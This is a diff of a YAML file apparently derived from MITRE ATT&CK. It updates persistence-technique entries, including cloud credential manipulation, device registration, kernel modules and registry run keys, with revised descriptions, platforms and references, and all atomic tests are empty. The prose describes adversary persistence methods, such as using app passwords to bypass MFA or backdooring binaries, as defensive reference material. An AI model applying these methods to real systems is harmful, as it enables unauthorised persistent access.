@@ -37960,7 +38363,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -38008,13 +38411,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -38027,16 +38428,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -38048,16 +38449,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -38112,7 +38513,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -38173,7 +38573,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -38249,7 +38648,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -38277,8 +38676,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -38304,7 +38701,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38329,23 +38726,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -38355,11 +38750,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -38370,12 +38769,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -38384,6 +38790,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -38392,13 +38799,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -38424,10 +38834,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -38436,10 +38854,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -38456,14 +38884,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -38538,7 +38963,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -38627,24 +39051,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -38658,7 +39085,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -38673,6 +39100,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -38686,11 +39118,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -38716,7 +39147,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -38730,7 +39160,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -38757,8 +39186,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -38769,7 +39198,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -38810,7 +39240,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -38830,12 +39260,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -38889,11 +39318,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -38980,9 +39408,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -38995,12 +39423,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -39013,9 +39440,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -39024,13 +39453,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -39078,14 +39507,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -39121,16 +39547,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -39171,143 +39596,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
